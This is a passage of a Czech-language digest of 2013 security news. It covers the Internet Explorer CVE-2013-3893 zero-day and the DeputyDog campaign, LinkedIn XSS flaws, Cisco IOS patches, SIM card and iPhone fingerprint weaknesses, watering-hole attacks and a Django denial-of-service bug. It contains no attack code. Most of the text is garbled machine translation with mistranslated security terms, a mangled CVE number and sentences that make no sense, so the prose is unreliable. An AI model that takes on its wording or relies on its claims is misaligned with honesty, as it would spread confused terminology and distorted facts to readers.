Microsoft uznal existenci zranitelnosti a jeho aktivní využívání začátkem tohoto měsíce, a vydala Fix je nástroj pro zmírnění nebezpečí, dokud náplast může být propuštěn. Od té doby, FireEye vědci mají svázané útoky na čínské hackerské skupiny, která zasáhla Bit9 dříve v tomto roce, a mají společné, že kampaň ("Operace DeputyDog") byla zaměřena na japonských organizací a začal 19. srpna, nejpozději. Potom ve čtvrtek vědci z obou AlienVault a Websense uvolnit svá zjištění ohledně využití použít. Researcher Jaime Blasco říká, že si všimli, že se pořádá na subdoméně vlády Tchaj-wanu systému e-nákupu, a zjistil, že návštěvníci, kteří navštívili hlavní stránku poprvé, bude okamžitě přesměrován na Exploit stránku a podáváme s škodlivého souboru. ale ne všichni návštěvníci byli zaměřeni -. jen ty, jejichž systém Windows XP nebo Windows 7 systémy byly / jsou spuštěny v angličtině, čínštině, francouzštině, němčině, japonštině, ruštině, korejštině a portugalštině a používat Internet Explorer 8 nebo 9 Alex Watson potvrdil Tchaj-wan připojení. "Naše ThreatSeeker Intelligence Cloud hlášeny potenciální oběť organizace v Tchaj-wan se snaží komunikovat s příslušnou škodlivým velení a řízení serveru jako daleká záda jako 01.07.2013. Jedná C & C komunikací předcházely široce oznámenou první použití tohoto útoku infrastruktury o více než šest týdnů, a naznačuje, že útoky vůči této hrozbě herce není omezen jen do Japonska, "řekl sdílené . "Websense Threat Intelligence naznačuje, že hrozba herecké útoky nebyly omezeny pouze na Japonsku bylo oznámeno dříve. Použití samostatných IP adres , registrace domén, a permutace na kapátkem místech naznačuje vysokou segmentací mezi útoky a různé týmy, které používají stejné sady nástrojů, které využívá, a C & C infrastrukturu, "dodal.


LinkedIn záplaty Více XSS zranitelnosti
28.9.2013 Zranitelnosti | Sociální sítě
Profesionální sociální síť LinkedIn je citlivý na čtyři odráží v cross-site scripting (XSS) zranitelnost, před vydáním opravu těchto chyb přes léto.

XSS zranitelnosti patří mezi nejčastější chyby on-line. V tomto případě by útočník mohl potenciálně využít LinkedIn uživatelům tím, že napíchne HTML nebo kód skriptu do svého prohlížeče, aby se krást uživatele cookie, podle umístění na Plný seznam zpřístupnění e-mailové .

Po úspěšném využívání problém, mohl by útočník pak poslat phishingových e-mailů kreslení nic netušící uživatele na klon webu nakazit oběti stroj s malwarem, nebo ukrást tohoto uživatele přihlašovací údaje.

První chyba je zneužitelná písemně upraveného HTML do "Sdílet aktualizace ..." pole na domovské stránce LinkedIn. Druhý a třetí XSS chybu Podobně lze provádět při návštěvě "Skupiny Možná vás bude zajímat v" sekci "skupiny" stránku. Kdysi tam, by útočník muset najít otevřenou skupinu a zahájit diskusi vložením více speciálně vytvořený kód do pole na této stránce před sdílení diskusi. Poslední chyba existuje na "skupiny", str. stejně. Nicméně, tohle je zneužít vytvořením skupiny, pak Vytvoření hlasování v rámci této skupiny vložení škodlivého kódu do pole pro vytvoření hlasování.

Eduardo Garcia Melia o ISEC Partners odhalila nedostatky v prosinci 2012. Podle Full Disclosure LinkedIn pevně problémy někdy v červenci 2013 a Melia předložila zranitelnosti zprávu Full Disclosure včera.

Threatpost natáhl LinkedIn potvrdit, že společnost je bezpečnostní tým byl skutečně vyřešen chyby ale nebyly k dispozici k připomínkování v době zveřejnění.

LinkedIn propaguje sebe jako největší světový profesionální sítě, se může pochlubit více než 238 milionů uživatelů po celém světě.

Profesní síť udělal dojem na začátku tohoto měsíce s odvoláním na zahraniční soudu Intelligence Surveillance , mlčenlivý soudu odpovědné za regulaci hodně z Národní bezpečnostní agentury špionáže úsilí , žádat, aby mu bylo dovoleno zveřejnit údaje o počtu národní bezpečnosti dopisů it obdrží.


Cisco IOS aktualizace opravy Osm Chyby
27.9.2013
Zranitelnosti
cisco_patchesCISCO IOS AKTUALIZACE ZÁPLAT OSM SLABÁ
Telekomunikační společnost Cisco tento týden varoval zákazníky, a těch, kteří vedou jejich software osmi samostatných zranitelností to záplatované ve svém operačním systému IOS (Internetwork) infrastruktury výrobku.

Cisco Security Incident Response produktu Team (PSIRT) vydala včera upozorňováni na sekci Zabezpečení Intelligence Operations svých internetových stránkách.

Více než polovina z rad řešit odmítnutí služby zabezpečení, které vyplývají z toho, jak je program konfigurován. Chyby zahrnují Network Time Protocol (NTP), funkce virtuální fragmentace montáží (VFR), funkce pro IPv6, přístup k síti (NAT), funkce, T1/E1 řidič fronty a DCHP realizace IOS. Všechny mohl - za správných okolností - mohlo neověřenému vzdálenému hacker způsobit stav DoS, a to buď zasláním upraveného paketů na zařízení, nebo jak se přístroj znovu načíst bez souhlasu uživatele.

Ostatní tři chyby zahrnují různé součásti zařízení.

Jedním z nich je vázána na Zone-Based Ios "Firewall (ZBFW) funkčností. ZBFW nesprávně zpracovává některé typy paketů protokolu HTTP, pokud je přístroj "nakonfigurován buď pro Cisco IOS Content Filtering nebo HTTP Brána aplikační vrstvy kontrolu." Všechno hacker by musel udělat, je poslat škodlivé pakety HTTP pomocí zařízení k využívání.

Druhá se týká problém v aplikaci Internet ios "Key Exchange (IKE), funkce, která by mohla vést k nevracení paměti a zařízení reload. Stejně jako ZBFW vuln IKE nesprávně zpracovává chybně IKE pakety. Některé speciálně vytvořenou IKE pakety může způsobit, že software není uvolnit přidělené paměti, následkem čehož dochází k nevracení paměti.

Konečně, klín chyba v protokolu RSVP (Resource rezervace) funkce umožňují hackerovi spustit "rozhraní fronty klín" na postiženém zařízení, které může vést ke ztrátě spojení, ztráta směrovacího protokolu a v některých případech, stav DoS . Rozhraní fronta klín je více či méně zranitelnost, kde jsou přijaté pakety do fronty a IOS, ale nikdy odebrána z fronty, dusí zařízení a způsobuje, že přestane fungovat.

Zatímco řešení jsou k dispozici u tří z osmi zranitelnosti, NTP zranitelnosti, klín zranitelnosti a zranitelnosti T1/E1 Cisco vydala bezplatné aktualizace softwaru, které lék všechny otázky IOS.

Všechny aktualizace jsou k dispozici na Cisco Security odpovědí a upozornění, a doložky a ty nasazení aktualizací jsou požádáni, aby přehodnotily své software, než záplatování je zajistit, aby jejich aktuální konfigurace bude i nadále podporována.

Cisco IOS běží na milionech počítačů po celém světě a je v podstatě sbírka směrovače, přepínače a funkcí, které jsou závislé na společnosti síťového systému. Je to podruhé v letošním roce Cisco vydala velkou dávku záplat pro produkt. Společnost také vytlačila sedm záplat pro software na konci března .


Java využije skok, Android malware se objeví mimo app obchodech
25.09.2013 Viry | Zranitelnosti | Hacking
Pokračující vzestup využívání útoků na, a to zejména proti Javě, a rostoucí sofistikovanost v mobilních hrozeb charakterizoval první polovině roku 2013, který viděl jeho podíl na zajímavých vývoj ve světě digitální bezpečnosti. Podle nové F-Secure je Threat Report , téměř 60% z top F-Secure deset zjištěných v prvním pololetí roku 2013 byly hrdinské činy. vysoké procento zjištěných činů je dobrá věc, podle Sean Sullivan, bezpečnostní poradce ve společnosti F-Secure Labs. "Skutečnost, že většina našich deset nejlepších detekcí blokují využije spíše než s užitečným zatížením - to znamená, že děláme dobrou práci, ujistěte se, že malware sám o sobě nemá ani šanci vstoupit do stroje," říká . Uživatelé v USA viděl největší chybu související útoky s 78 z každých 1000 uživatelů potýká exploit pokus. Německo a Belgie následovala 60 ze 1000 potýká exploit pokusy. Java cílené využije vést smečku využije jako celku, což tvoří téměř polovinu z deseti největších odhalení, a to až z třetiny předchozí pololetí. Využije jsou programy, ale jsou to prostě jen další prostředek pro získání škodlivého kódu do stroje, jako infikované jednotky USB nebo e-mailem. Obvykle útočí přes škodlivé nebo narušení webových stránek, které využívají chyb v kódu na počítači je nainstalované aplikace pro přístup do počítače a infikovat ji s malware, který může špehovat na uživatele, ukrást hesla nebo jiná citlivá data, nebo povolit zločinci převzít kontrolu ze stroje. bylo 358 nových rodin a varianty malwaru Android objeven Labs F-Secure v 1. pololetí téměř zdvojnásobil celkový počet Labs kdy objevil na 793. (Počet vzorků Android nacházejí v 1. pololetí bylo 405.140, včetně spyware a adware, malware vzorky samostatně číslovány 257443). Symbian následoval s 16 nových rodin a variant. Žádné nové rodiny nebo varianty byly objeveny další mobilní platformy. Android malware není jen distribuována app obchodech už, a to buď. V první polovině roku 2013 došlo rozvoz malvertising a automatickým stahováním z webu při návštěvě ohrožena stránky. Malvertising nebo reklamy, které vedou uživatele na nebezpečné výrobky, se stále více používá k distribuci mobilního malware, náležitý z části k jeho širokému dosahu. Zatímco ještě méně sofistikované na mobil, než na PC, jsou drive-by download bude pokračovat jako útoku. Mobile Drive-bys použít potvrzující zprávu s dotazem, zda chce uživatel nainstalovat aplikaci, což je více než zřejmé, PC drive-odstavných ploch, s možností obcházet. Stels, trojské Android, které slouží více účelům, od budování botnety krást Čísla mobilních transakcí Authentication (mTANs) jako bankovní trojan, používá metody, které jsou obvykle charakteristické pro Windows malware, jako je spam jako metody distribuce. To slouží jako důkaz, že Android malware se postupující blíže k dosažení vysoce rozvinutou úroveň hrozby Windows.


Vystavení slabá místa zabezpečení máme tendenci přehlížet
24. září Zranitelnosti | Zabezpečení

Jako bezpečnostní analytik se často ptají na otázku: "Jaká nebezpečí a zranitelnosti si myslíte, že nám umožňují vidět do budoucnosti?" To je velmi zajímavá otázka, ale také známkou toho, že způsob, jak přemýšlet a diskutovat o IT-bezpečnost je v podstatě špatně. Opravdu potřebujeme investovat čas a prostředky soustředit se na budoucím hrozbám, když jsme ještě před útoky, které byly diskutovány již více než 20 let?

Pokud jste se podívat na některé z hlavních porušení jsme viděli v minulosti, útočníci nepoužili Zero Day zranitelná. Také pokud se podíváte do exploit kity, jsou jen velmi málo skutečně vybavena využije využívají Zero Day zranitelnosti. Aby bylo možné analyzovat to do hloubky, Kaspersky výzkumník David Jacoby spojila své síly s ČSÚ Outpost24 Martin Jartelius, získat přístup k unikátním statistik souvisejících s technickými rizikových expozic od dodavatele správu slabých míst a provedli několik bezpečnostních auditů, který zahrnoval jak sociálního inženýrství, testy a penetrační testy. Nicméně, to bylo vše provedeno bez využití jakékoliv chyby.

Začali jsme analyzovat statistické údaje, které jsme získali, a to netrvalo moc dlouho, dokud naše teorie se ukázala jako správná. Podívali jsme se na frekvenci, starých chyb, což znamená, jaké chyby vlastně jsme zranitelní proti. Rozhodli jsme se zařadit statistiky pro Švédsko a Beneluxu v této zprávě.

Dokonce i statistiky ukazují, že jsme docela dobře chránit se proti zranitelnosti, které jsou nové, ale kupodivu máme tendenci zapomenout na starší zranitelnosti. Některé systémy jsou stále zranitelné zranitelnosti starších než 10 let.

Další zajímavou otázkou je: "jaké systémy máme skutečně snaží zajistit?" Je to velmi žhavé téma hovořit o kritické infrastruktury, ale to, co jiný druh "veřejných zdrojů" tam venku, které by mohly být rozhodující? Co například hotely? Nebo nemocnice? Nebo radiostanice například?

Při výzkumu je vždy důležité, aby se skutečná fakta, a jeden ze způsobů, jak to udělat, je dostat své špinavé ruce. V našem výzkumu jsme chtěli provést praktickou výzvu několik firem z různých odvětví. Hlavní myšlenkou bylo jít ven a navštívit společnosti a provést bezpečnostní audit s předem definovanou seznamu na základě výsledků z výzkumu. Naším cílem bylo ověřit a zjistit, jestli mají nějaké systémy citlivé na staré hrozby a rovněž přezkoumat jejich bezpečnostní rutiny a mnoho dalších testů. Nicméně, jen hrstka firem vlastně chtěl k účasti na této výzvě. Oba si myslíme, že je to naprosto dnes jedním z klíčových problémů, trávíme raději více času na nové vzrušující zranitelností a hrozeb, než ve skutečnosti, že péči o skutečných problémech. Rozhodli jsme se provést úkol stejně, a výsledky byly docela zajímavé.

Přečtěte si celý výzkum papír zde .


Výzkumník zoufá nad kritické SIM nedostatky jsou stanoveny před útoky se stalo
24. září 2013. Zranitenosti | Zabezpečení
Dva měsíce, které uplynuly od badatel Karsten Nohl oznámil, že našel a podařilo se pákový kritické chyby v šifrovací technologie používané některými SIM kartami, ale telekomunikační společnosti jsou ještě reagovat a opravit je.

Ano, když vyšel s informacemi a sdílet ji s telekomunikací, oni říkají, že by se na to. Ale jak čas ubíhal, Nohl stal se přesvědčený, že se odklad jednání, nebo dokonce přímo v plánu nic nedělám určit na alespoň jeden z nich, protože jim to umožňuje bezobslužně nasadit svůj vlastní software aktualizace na thusly backdoored telefonů. Nohl objev mu umožnila objevit šifrování DES klíče jednotlivých ohrožených SIM karty jednoduše zasláním speciálně vytvořenou SMS na cílové zařízení, pak zlomit a používat znalosti na dálku překonfigurovat na SIM tak, že přijímá další pokyny jako pro instalaci špionážní aplikace bez uživatel si toho byli vědomi. Byl dokonce schopen naklonovat kartu. "Mysleli jsme, že náš příběh byl jedním z bílo-hat hackerů prevenci trestné činnosti," sdílel s registrem, ale řekl, že proto, že žádný přímý trestný čin byl objeven v současné době děje v důsledku těchto vad, žádné šetření byla zahájena o věci. Frustrovaný zjevné ignorování odvětvím telekomunikací a SIM výrobců, se rozhodl přijít s další podrobnosti o zranitelnosti. Tyto údaje by mohly pravděpodobně pomoci hackerům replikovat své vlastní útoky, ale může také vynutit ručně společnosti "dělat něco o tom. Mezi společnosti, které se kontaktovaných byl Gemalto, která je největším světovým SIM karta výrobce, a on dostal řekl, že nedostatky byly nedůležité. Společnosti mají pravdu v jedné věci. V současné době, útok je poměrně složitá a útočník musí mít dobré znalosti o rozvržení paměti na SIM kartě a kryptografie, a jedná se pravděpodobně o nepatrný počet útočníků, kteří by byli schopni vytáhnout ho. ale jako vadné SIM karet stále hostit bankovní aplikace, čas eventfully ve chvíli, kdy je možnost krádeže obrovské sumy peněz budou s větší pravděpodobností, a útočníci thusly více motivováni. Bohužel, on si myslí, že společnosti budou naslouchat a uskutečnit změny, pouze tehdy, když vážné útok zneužívat případných chyb se stane.


IE 0-day attack zprávy tlačit ISC zvýšit oficiální úrovně ohrožení
24. září 2013.Zranitelnosti | Hacking
Během víkendu, FireEye vědci podařilo vrhnout světlo na in-the-Wild útoků Využitím nejnovější objevil Internet Explorer zero-day zranitelnosti (CVE-2013-3893), a byly sledovány zpět do čínské hackerské skupiny, které postihly . Bit9 letos Podle jejich výzkumu, kampaň - daboval DeputyDog - byl cílení japonské organizace od August 19 srpnu 2013, a útočníci byli pomocí C & C infrastrukturu, která se vztahuje k infrastruktury používané v útoku na Bit9 :

Některé vzorků malwaru, které objevili a analyzovány byly sestaveny 19. srpna. Jako připomínka: Microsoft vydala opravit chyby zabezpečení dne 17. září, a potvrdila, že se týká všech podporovaných verzí aplikace Internet Explorer. Mají stále není potvrzena, kdy bude tato aktualizace zabezpečení, kterým se stanoví vadu být propuštěn. Další je Patch Tuesday je naplánováno na říjen 8, takže zbývá doufat, že Microsoft se bude zabývat vydávání out-of-band patch. Mezitím Internet Sans "Storm Center reagoval tím, že zvýší své oficiální úrovně ohrožení na "žlutý", po "větší důkaz o zneužití ve volné přírodě o Microsoft Security Advisory 2887505". "Tam je nějaký náznak, že weaponized exploit může být v širším oběhu, takže očekávat, že to rozjet rychle," komentoval ISC psovod Russ McRee a dodal, že Rapid 7 je také pravděpodobné, že uvolnění Metasploit exploitu pro chybu brzy. "Nejjednodušší způsob, jak se vyhnout tomuto riziku je použít jiný prohlížeč než Internet Explorer," upozornil Ross Barrett, senior manažer bezpečnostní inženýrství na Rapid7. "Uživatelé, kteří musí používat Internet Explorer by měla nainstalovat všechny dostupné záplaty Internet Explorer, a používat pouze nejnovější dostupné verze. Ani jedna z těch věcí, bude přímo pomoci s tímto konkrétním problému, ale jsou dobré postupy a předpoklady pro následujících akcí, které mají být v veškeré účinné. " "Chcete-li snížit riziko zneužití tohoto problému, nainstalujte Emet 4.0, nakonfigurujte ji nutit ASLR a umožňují řadu haldy postřiku a ROP ochran. Navíc, tam je" fixit "k dispozici od společnosti Microsoft, který se bude snažit změnit systém, aby se zabránilo zneužívání, "řekl uzavřena .


Prolomeno. První hackeři dokázali překonat snímač otisků nového iPhonu

23.9.2013 Hacking | Zranitelnosti | Biometrika | Mobil

Stačil týden a bezpečnostní prvek snímače otisků padl. Skupina německých hackerů tvrdí, že se jí podařilo zabezpečení prolomit jen dva dny poté, co Apple začal modely distribuovat na pulty obchodů. Právě snímač otisků má přitom chránit přístroje před zločinci a slídily.

Snímač otisku prstu zabudovaný v tlačítku je jedním z hlavních lákadel nového iPhonu 5s
Bezpečnostní prvek telefonu se údajně podařilo prolomit německé skupině známé jako Chaos Computing Club, tedy CCC. Skupina to uvedla na svých stránkách. Zástupci Applu se ke zprávě nevyjádřili.

CCC zveřejnil video, které ukazuje, jak se jim podařilo dostat do iPhonu 5S pomocí falešného otisku prstu. Skupina získala otisk tak, že vyfotografovala a vytiskla na tenkou folii. Ke svému článku přidala navíc návod, jak otisk prstu získat.

„Otisk prstu by se neměl používat pro zabezpečení čehokoliv. Necháváte ho všude a je velmi jednoduché si vyrobit falešný otisk prstu,“ uvedl v článku hacker, který si říká Starbug. Podle CCC podobný postup lze použít k prolomení většiny snímačů otisků prstů na trhu.

Dotykový senzor iPhonu má telefon odlišit od konkurence

Dotykový senzor na novém modelu iPhonu 5S slouží k odemknutí přístroje a nakupování v internetovém obchodě iTunes. Uživateli stačí jednoduše přiložit svůj prst na hlavní tlačítko telefonu. Recenzenti se minulý týden rozplývali nad jeho spolehlivostí a nad tím, jak se snadno používá.

Bezpečnostní odborníci, kteří minulý týden nabídli odměnu tomu, kdo jako první prolomí zabezpečení snímače prstů iPhonu, uvedli, že zkoumají informace zveřejněné na internetových stránkách CCC, ale chtějí více informací. Odměna za prolomení kódu činí více než 13 tisíc dolarů (zhruba 247 tisíc korun) v hotovosti.

Bezpečnostní rizika skrývá také iOS 7

Forbes.com ale mezitím informoval, že jistý voják na Kanárských ostrovech už odhalil slabé prvky v zabezpečení zasahujícím operační systém iOS 7, který Apple stávajícím uživatelům iPhonů a tabletů iPad zpřístupnil ve středu. Podle něj je během několika vteřin možné obejít uzamčení obrazovky a dostat se k fotografiím a dalším materiálům. Mluvčí Applu Trudy Mullerová řekla, že firma v příští aktualizaci systému provede opravy.


Nový Internet Explorer Zero-day Nalezeno v cílených útoků

21.září 2013 Zranitelnosti | Hacking

17. září, Microsoft vydá certifikát Poradní Ohlášení nové zero-day zranitelnosti v aplikaci Internet Explorer: Microsoft Internet Explorer chyby zabezpečení poškození paměti (CVE-2013 až 3893). Doporučení uvádí, že zranitelnost může dojít k poškození paměti takovým způsobem, který by umožnil útočníkům spustit libovolný kód. Útok funguje lákavé uživatele k návštěvě speciálně vytvořené webové stránky, na jejichž území se chyby zabezpečení prostřednictvím aplikace Internet Explorer. Microsoft rovněž uvádí, že v této době je známo, že zranitelnost být využívány pouze v omezeném počtu cílených útoků.

Zatímco Microsoft je ještě vydat opravu této chyby, které již byly poskytnuty dočasné " Fix It "nástroj řešení jako řešení, dokud je tato aktualizace zabezpečení k dispozici. Aby Zákazníci Symantec jsou chráněny proti tomuto Internet Explorer zero-day, následující ochrana byla zavedena:

Antivirus

Bloodhound.Exploit.513
Intrusion Prevention System

Web útok: Microsoft Internet Explorer CVE-2013-3893
Web útok: MSIE poškození paměti CVE-2013-3893 3
Symantec bude i nadále vyšetřovat tento útok s cílem zajistit nejlepší možnou ochranu místě. Jako vždy doporučujeme, aby uživatelé zachovat jejich systémy up-to-data s nejnovějšími oprav softwaru a nezahájí žádné podezřelé e-maily. Rovněž doporučujeme zákazníkům využívat nejnovější technologie Symantec a začlenit nejnovější Symantec spotřebitelských a podnikových řešení, aby co nejlépe chránit před útoky tohoto druhu


Produkt Pokrytí a zmírnění jejich důsledků pro CVE-2013-3893

21.září 2013 Zranitelnosti | Hacking | Zabezpečení

Zpravodaj zabezpečení společnosti Microsoft (2887505)
17. září th , 2013, publikoval Microsoft Security Advisory 2887505, který coverers vzdálené spuštění kódu ve všech podporovaných verzích aplikace Microsoft Internet Explorer. Chyba spočívá v manipulaci s objekty v paměti, které byly odstraněny nebo nesprávně přidělena. Konkrétně může use-po-free chyba v HTML engine (aka mshtml.dll) být použity k vyvolání stavu ohrožení.
Tato chyba je v současné době využíván v omezených a cílené útoky. Funkční využití a malware artefakty byly identifikovány ve volné přírodě.
Sanace / Zmírnění
Microsoft
Společnost Microsoft vydala Fixit zástupného řešení k řešení tohoto problému. Kompletní oprava ještě není uvolněna.
Zdroje
http://technet.microsoft.com/en-us/security/advisory/2887505
http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx
McAfee Labs
Následující produkty McAfee / zabezpečují pokrytí
McAfee Vulnerability manažer
McAfee MVM / FSL Obsah Vydání 9/18/2013
McAfee Antivirus
Pokrytí je k dispozici v 7204 DAT, propuštěn na 9/20/2013
Jméno - Exploit-IE heur
McAfee Network Intrusion Prevention Systems (NIP)
UDS Nouzové odblokování v 9/17/2013
UDS podpis útok ID 0x4510ef00
Name = "UDS-HTTP: Microsoft Internet Explorer onlosecapture Použití po volném zabezpečení
Jako nové informace je možno získat, nebo produkt, pokrytí je aktualizován, společnost McAfee Labs vás informovat.


Stupeň ohrožení Žlutá: Ochrana doporučení týkající se aplikace Internet Explorer využije v přírodě

20. září 2013.Zranitelnosti | Hacking

Internet Storm Center začíná vidět více poznatků o zneužití ve volné přírodě o Microsoft Security Advisory 2887505 . V souladu s tím jdeme na InfoCon až žlutá.

Per poradenství:
Microsoft vyšetřuje veřejné zprávy o zranitelnosti ve všech podporovaných verzích aplikace Internet Explorer. Microsoft si je vědoma cílených útoků, které se pokoušejí zneužít tuto chybu zabezpečení v aplikaci Internet Explorer 8 a Internet Explorer 9. Aplikace Microsoft Fix IT řešení, CVE-2013-3893 Fix It Obejití , zabraňuje využívání tohoto problému. Toto řešení je i fixit Emet 4.0 pokynů. Jistě zvážit použití Emet 4,0 , kde můžete. Upozorňujeme, že opravy se zdá, že jen pomoci 32bitové verze prohlížečů. To znamená, že zranitelnost postihuje všechny verze aplikace Internet Explorer, s výjimkou případů systémů Windows Server 2008 a 2012 základních zařízení.

Zdá se, že exploit byl ve volné přírodě od 29.srpna 2013, kdy byl poprvé viděn jeden z on-line bezpečnostních skenerů. Tam je nějaký náznak, že weaponized exploit může být v širším oběhu, takže očekávat, že to rozjet rychle.

Vznikající hrozby má Snort podpisy pro tento problém: http://www.emergingthreats.net/2013/09/19/daily-ruleset-update-summary-09192013/ . Očekávejte rychlý 7 až pravděpodobných bitů vydání Metasploit v blízké budoucnosti. Budeme aktualizovat zde vidíme více informací o této chybě se objeví.


Webové stránky firem z odvětví energetiky ohrožena zalévání děr útok
20. září 2013. Viry | Hacking | Zranitelnosti
Webové stránky téměř tucet firem z odvětví energetiky byly zneužity sloužit jako tzv. "zalévání děr", kde by se návštěvníci podávané s malware nebo které by mohly být přesměrovány na jiné webové stránky, kde je totéž by se stalo.

Podle Cisco výzkumníků, kteří sledovali útok od začátku května, mezi deseti webových stránek, které byly injekce s nebezpečným iframe použité v kampani, jedna patří k průzkumu ropy a zemního plynu firmy s operacemi v Africe, Maroku a Brazílie , jeden na rozvod plynu se nachází ve Francii, jeden fyzické stanice plynové elektrárny ve Velké Británii, a několik investičních a kapitálových firem, které se specializují na odvětví energetiky. Téměř polovina návštěvníků na těchto stránkách pocházejí z finančního a energetického sektoru. "Je zajímavé, že šest z deseti iframe vstřikováním webových stránek hostované na stejném serveru, zřejmě služby podle stejné firmy web design. Tři z těchto šesti byl rovněž ve vlastnictví téže mateřské společnosti," zdůraznil Cisco Emmanuel Tacheau. "To je pravděpodobně údaj lokality byly ohroženy prostřednictvím ukradených přihlašovací údaje, případně v důsledku infekce s konstrukční firmy nebo jejich poskytovatele hostingu." malware je umístěn na stránkách tří napadených internetových stránek ( keeleux.com , kenzhebek.com a nahoonservices.com ) a nainstalovat na počítače obětí útočníci mají pákový efekt, využít kód pro zranitelností ve starších verzích Javy, Internet Explorer a Firefox / Thunderbird. Tacheau neříká, zda je kampaň probíhá, ale ukázal na to, že jak čas plynul, útočníci modifikovali vstřikováním iframe, využívat kódu a servírované malware. "chrání uživatele před těmito útoky zahrnuje vedení stroje a webových prohlížečů plně patch, aby se minimalizovalo množství chyb zabezpečení, které útočník může zneužít," poukázal na to, s tím, že webový provoz filtrování řešení nasazeno na úrovni sítě může blokovat škodlivý obsah před tím, než může dosáhnout stroje určeného cíle.


Společnost Microsoft vydává Out-of-band poradenství pro všechny verze aplikace Internet Explorer

17. září 2013. Zranitelnosti

Microsoft právě vydal poradní na výsledek zranitelnost Internet Explorer , který by umožnil vzdálené spouštění. Zpráva odkazuje veřejná dostupnost informací o jeho zranitelnosti. Dlouhý příběh krátký, cílený útok, který se uživatele k návštěvě škodlivého webové stránky (nebo škodlivý obsah na jinak bezpečné webové stránky) by mohlo vést k poškození paměti, které může spustit libovolný kód s oprávněními přihlášeného uživatele. Dvě navrhovaná opatření jsou poskytovány společností Microsoft, platí fixit poskytované společností Microsoft ani používat Emet 3.0/4.0 , která poskytuje všeobecný ochranu paměti (a pravděpodobně není špatný nápad nasadit stejně). Všimněte si, že fixit platí pouze pro 32bitové verze aplikace Internet Explorer.

Tento příspěvek bude aktualizován s více detaily, jak se situace odůvodňuje.


Příliš dlouhá hesla může DoS některé servery
17. září 2013. Zranitelnosti | Zabezpečení
Objev zranitelnosti v populárním open source aplikací web rámcové Django nedávno prokázala, že použití dlouhého hesla není vždy to nejlepší, co má dělat.

Jak vysvětlil Web Developer James Bennett, Django používá PBKDF2 algoritmus hash uživatelských hesel, takže je velmi obtížné pro brute-force útoky, které mají být úspěšně proveden. "Bohužel, tato složitost být také použit jako útoku. Django neukládá než maximální na délce hesla holého textu, což znamená, že útočník může jednoduše podat libovolně velký - a zaručený k selhání - hesla, nutit server se systémem Django provést výsledný hash drahé výpočtu ve snaze kontrolovat heslo . Heslo jeden megabajt ve velikosti, například, bude vyžadovat zhruba jednu minutu výpočtu pro kontrolu při použití PBKDF2 hasher, "Bennet vysvětlil v blogu. "To umožňuje denial-of-service útoků přes opakované podání velkých hesel , vázání serverové zdroje na drahé výpočtu příslušných hash. " Existence vady byla zveřejněna na veřejné django-developers mailing listu, a opustil základní tým usilovně snaží opravit co nejdříve je to možné. Naštěstí to trvalo jen jeden den, a oni to udělali tím, že omezí hesla 4096 bajtů. Nově vydána Django 1.4.8, Django 1.5.4 a Django 1.6 beta 4 obsahuje opravu a všichni uživatelé se doporučuje provést upgrade na jednu z tyto verze ihned. Bennett také nezapomeňte se zeptat, že všechny budoucí potenciální bezpečnostní problémy vždy sdělují prostřednictvím e-mailu na security@djangoproject.com, spíše než prostřednictvím veřejných kanálů.


Microsoft re-vydání opravy, které byly příčinou smyčce instalace

17.9.2013 Zranitelnosti | Zabezpečení

Minulý týden počet lidí, kteří uvádí, že existují tři místa, která průběžně instalovány. Microsoft znovu vydala tyto opravy po upevnění detekční problém, který byl příčinou problému.

Následující bylo re-vytékal:
Bulletin zabezpečení společnosti Microsoft MS13-067
Aktualizace zabezpečení aplikace Microsoft Office SharePoint Server 2007 (KB2760589)
Bulletin zabezpečení společnosti Microsoft MS13-072
Aktualizace zabezpečení pro systém Microsoft Office 2007 suites (KB2760411)
Aktualizace zabezpečení pro systém Microsoft Office 2010 (KB2767913)
Bulletin zabezpečení společnosti Microsoft MS13-073
Aktualizace zabezpečení aplikace Excel 2003 (KB2810048)
Aktualizace zabezpečení aplikace Microsoft Office Excel 2007 (KB2760583)
Aktualizace zabezpečení aplikace Microsoft Office Excel Viewer 2007 (KB2760590)
Aktualizace zabezpečení pro systém Microsoft Office 2007 suites (KB2760588)
Bulletin zabezpečení společnosti Microsoft MS13-074
Aktualizace zabezpečení pro systém Microsoft Office 2013 (KB2810009) 64-Bit Edition
Aktualizace nesouvisející se zabezpečením:
Aktualizace aplikace Microsoft PowerPoint 2010 (KB2553145)
Aktualizace aplikace Microsoft PowerPoint Viewer 2010 (KB2553351)
Pokud počáteční náplast pracoval tam pro tebe není třeba nic dělat. Pokud váš stroj šel do instalačního smyčky pro patch by měl nyní být stanovena a můžete testovat a nasazovat.


Útoky na nepodporovaný Java 6 jsou na vzestupu
13. září 2013. Zranitelnosti | Hrozba
Jak předpovídal na konci roku 2012 a dokládá stále se rozšiřující použití exploit kity, zranitelnosti v populární a rozšířený software, jako je například Acrobat Reader Java a Adobe a Flash jsou na vrcholu seznamu z nejvíce využívány podvodníci z internetu.

Zero-da y chyby jsou menší problém, než ty staré - ve skutečnosti, vzhledem k tomu, že mnoho lidí stále používají starší, zranitelné softwarové verze softwaru, ovládat využije nulového dnů je prakticky zbytečné průměrného Cyber ​​podvodník, který jde po penězích . A situace je asi dostat mnohem horší, říká, že Trend Micro Threat Communications Manager Christopher Budd. "Jsme svědky útoků zaměřených neopravených zranitelností v Javě 6, široce nasazen ale nikdo není podporována verze Javy. A my jsme svědky nárůst sofistikovanosti útoků s útočníky vykonávajících nižší úrovně útoky proti Layer Native Java, "řekl píše . Oracle ukončuje podporu Java 6 v únoru 2013, což znamená, že žádné další opravy zabezpečení. "Zatímco prodejce ukončení podpory a již poskytuje bezpečnostní opravy není nová věc, skutečnost, že více než 50% uživatelů se tam stále běží Java 6 je to bezprecedentní situace," řekl poukazuje. Po odhalení rozšířené aktivní využívání Java zero-day v lednu 2013, několik bezpečnostních expertů vyzývají uživatele, aby vypnutí Javy, pokud jej nepotřebujete. Několik měsíc dříve, Apple se rozhodl opustit aktualizaci Javy 7 k Oracle a odinstalovat svou Java applet plug-in ze všech webových prohlížečů (uživatelé mohou stáhnout poté od Oracle, pokud chtějí). Nicméně, stále ještě existují některé tři miliardy přístroje tam ještě v Javě, a více než polovina z nich běží na falešnou Java 6. "A teď jsme svědky první instance aktivních útoků proti této velké skupiny zranitelných cílů. Se JAVA_EXPLOIT.ABC útoku, jehož cílem CVE- 2013-2463 máme opravenou Java 7 zranitelnosti, které je unpatched na Java 6 a byl napaden. Zatímco útoky nejsou příliš rozšířeny ještě bylo začleněno do sady Exploit Neutrino což ukazuje na vysokou pravděpodobností rostoucí útoky proti této chybě zabezpečení "Budd sdílené s tím, 